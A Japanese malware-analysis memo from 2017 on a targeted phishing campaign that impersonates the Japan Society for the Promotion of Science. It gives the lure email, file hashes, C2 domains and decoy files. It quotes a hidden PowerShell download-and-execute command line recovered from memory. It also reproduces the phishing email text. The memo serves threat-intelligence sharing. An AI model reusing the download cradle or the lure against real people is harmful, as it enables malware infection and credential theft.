メニュー

日本学術振興会を騙った標的型攻撃メール 調査メモ

2017年1月22日 - malware
日本学術振興会を騙った標的型攻撃メール 調査メモ

2017年1月17日に日本学術振興会より同組織を装った不審なメールが発生しているという注意喚起が出されました。(魚拓
翌日の2017年1月18日には、明治大学からの注意喚起。(魚拓
2017年1月20日には中央大学から注意喚起が出されました。(魚拓

そちらの標的型攻撃メールについて調査しましたので、そちらの調査結果を共有します。

 

まず、上記の注意喚起から得られた標的型攻撃メールの情報は以下の通りです。

メール情報
項目名 内容 備考
送信元メールアドレス [email protected] xxxxxxxx部分は恐らく伏字。
件名 【H29科研費】繰越申請について
添付ファイル 【H29科研費】繰越申請について.zip 展開パスワードが設定されている。
本文 お世話になっております。
今年度の科学研究費助成事業(科学研究費補助金)の
繰越についてお知らせいたします。
翌年度に繰り越すことができるのは、計画の変更等に伴い当該年度中に使用する
ことができなかった科研費です。例えば、研究計画の終了後に余った科研費は、
繰越の対象にはなりません。
■申請の有無についての回答期限
平成29年1月26日(木) 12時【厳守】
■○○係提出期限
平成29年2月2日(木) 12時【厳守】
―――共通――――――――――――――――――――――――――――――
※特別研究員奨励費の場合、最終年度の方は科研費を繰り越すことができません。
※基金化されている課題については、手続きなく繰越が可能です。
※他機関から配分を受けている分担金の場合、繰越申請は代表者の研究機関にて
取りまとめます。締切は各所属機関によって違いますので、速やかに代表者の
先生にご連絡ください。
ご不明な点がございましたら、○○係までご連絡くださいませ。
どうぞよろしくお願いいたします。
—-
日本学術振興会 ○○係
○○ ○○
[email protected]
TEL:03-3263-xxxx
FAX:03-3221-xxxx
〇やxは伏字にされていると考えられる。

このメールに添付されていたと考えられるファイルの情報は下記の通りです。

【添付ファイル情報】

項目名 内容 備考
ファイル名 【H29科研費】繰越申請について.zip 展開をするためのパスワードが設定されている。
ハッシュ値 MD5: EA70F760E7E58A7B22601BA4BD3CEE13
SHA-1: 3C456BE43E01FD048305B0914C4F71E283A2AA0F
展開後ファイル名 電子申請操作方法 研究者用.zip

上記ファイルは展開を行うためにパスワードが設定されていました。

そのパスワードは、注意喚起にあったメール本文にあった(共有を行う際に削除された可能性)のか
それとも、そのメールとは別に攻撃者から送られてくるメール内に記載されていたのかということは不明です。
そのため展開のためのパスワードが分かりませんので今回はZipに設定されているパスワードの解析を行いました。
その結果、パスワードが判明したため、そのパスワードを使用して展開しました。
展開後のファイルの情報は下記の通りです。

 
【展開後ファイル情報 – 1】

項目名 内容 備考
ファイル名 電子申請操作方法 研究者用.zip
ハッシュ値 MD5: 23C5226E6BF83D768720524FB743C8EB
SHA-1: E7103C2BBC24087B0326C7E3C521B613D99A503E
展開後ファイル名 H29_c-26.lnk 「電子申請操作方法 研究者用」フォルダ内に展開される。

上記、圧縮ファイルを展開するとショートカットファイルが取り出すことができます。
このファイルに関する情報は下記の通りです。

 
【展開後ファイル情報 – 2】

項目名 内容 備考
ファイル名 H29_c-26.lnk
ハッシュ値 MD5: 0B6845FBFA54511F21D93EF90F77C8DE
SHA-1: CC3B6CAFDBB88BD8DAC122E73D3D0F067CF63091
ダウンロード先ドメイン koala.acsocietyy.com このドメインから悪意のあるファイルをダウンロードし、そのファイルが実行されます。

上記ファイルは下図の通りです。

上記ファイルを実行するとPowerShellを利用してダウンロード先ドメインのアクセスし悪意のあるファイルを「koala.acsocietyy.com」からダウンロードします。

メモリ上で確認できたPowerShellのコマンドラインは以下の2つです。

powershell.exe -nop -w hidden -exec bypass -enc エンコードされた文字列

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -w hidden -exec bypass -c “IEX (New-Object System.Net.Webclient).DownloadString(‘https://ダウンロード先を短縮したURL’)”

上記のようにPowerShellが実行された後、ダウンロードされたファイルが実行されるのですが
そのファイルは拡張子が「.jpg」となっているものの画像ファイルではなく、シェルコードを含むファイルでした。
そちらのファイルに関する情報は下記の通りです。

【展開後ファイル情報 – 2】

項目名 内容 備考
ファイル名 20170112001.jpg
ハッシュ値 MD5: 6F5648EA4CA8A65C36C328C5AE8AC096
SHA-1: 154669CE22C0B29AF28E0677BC65C43FC35CDD6A
通信先ドメイン hamiltion.catholicmmb.com

また、上記ファイルが実行された後、通信を行うことに加え、実行したコンピュータ上でMicrosoft Excelが起動し、下図のようにファイルが表示されました。

上記のデコイファイルの情報は下記の通りです。

項目名 内容 備考
ファイル名 h29c26.xls
ハッシュ値 MD5: 15A34BEAC5D75F5AB7B94D14FF3C0B5F
SHA-1: FE4259B82787CBC44A85FAC9652778B27C6EC587

 
また、拡張子jpgを持つ、シェルコードを含むファイルがホストされているサーバ上に同様の動作をするファイルが
複数見つかったためそのファイルについての情報を以下に記載します。

ファイル名 ハッシュ値 通信先ドメイン デコイファイル名 デコイファイルハッシュ値
20170112002.jpg MD5: 8A21337BE17E1E921EEB4D1B9C1B4773
SHA-1: D16DA0DC12AEA0B64ABD3871A794CD9AF38F2DB4
gavin.ccfchrist.com jp2421.docx MD5: CB8CB3E16408976EF209735B337ACA4B
SHA-1: 05FFD7AB75531130871FE514EA45AF0EC86CED2F
20170112003.jpg MD5: 6257E9973EB355B73D7610BE8C1F0663
SHA-1: DA866450DA34276EA3D3D0E37174392F2050FBA2
gavin.ccfchrist.com jp231837.docx MD5: 07E5F351325B1B50C4D9C0DCC73EE294
SHA-1: 4A56062E1BD89C29930B4316DBB3CA6814DD0DBF
20170112004.jpg MD5: 994FDC67386BD33BF849DD97ADC04244
SHA-1: B52D9AE49DC5EA66FAF4DDADE21863EE3A84670F
gavin.ccfchrist.com 1701.docx MD5: A25A1B81525C8DD7C59B0D44F20B1981
SHA-1: 311D8EED87FDDE5DB586E7AD160979436111D80B
20170112005.jpg MD5: 26F932C0FF3DD6BBF0361A6B97343B1A
SHA-1: AF6BFC1D812FEAABEEF618B2AC926AFC49290FA7
gavin.ccfchrist.com 17h291.docx MD5: 582BBE1C49290CD5DBF33F2B6507F484
SHA-1: FCEFD2DDEA18DCA79B86AE46524030D0826958A3
20170112006.jpg MD5: 20E5D623AF9AFE095EF449CB9B6C9B46
SHA-1: 24BEBA149D3E092C40F384157C520ECF6A530C58
gavin.ccfchrist.com h2901.doc MD5: 2F1722210A991C50E6484911E0B7BBEF
SHA-1: ED3DB3E080077493C87AF6E52FB6B9B117041179
20170112007.jpg MD5: B45318FE5C373CF4E252BAEA82FB0337
SHA-1: 6789F00428E9143082C177C8CD2C37B31F2BDC0C
gavin.ccfchrist.com h2901.docx MD5: 59F23652DC1BAD9B33B5345A1CDE8C7C
SHA-1: E6273848449DA96566A6D894DEB4DD64AC843C22
20170112008.jpg MD5: 89CDAE384C49F321A22DFB848CFA46ED
SHA-1: 5F7AA0011C14AE327225F2EE49D81CE749FEA142
hamiltion.catholicmmb.com H29.xls MD5: 320F6A41238EFADEDA9A8C50CA0796A3
SHA-1: 6107A1FBF9056572B9C31CB293FA4CF79A777AC5
20170112.jpg MD5: 454A7F651E366EC0982216AE8D45544D
SHA-1: F2E1A11FE95D0340228271BD5D84D3C40A862F51
gavin.ccfchrist.com 38.doc MD5: 037E7C0620AB5D83A5A36974527A6DB3
SHA-1: AAAE4D6CE6C642F078CE16E1401D573B2DC101B1

情報共有は以上です。

 
 

【2017/01/29】
それぞれのデコイファイルに関する情報を追記

 

【2017/01/27】
シェルコードを含むファイルがホストされているサーバ上で見つかった同様の動作をするファイルについて追記

 

【2017/01/22初版公開】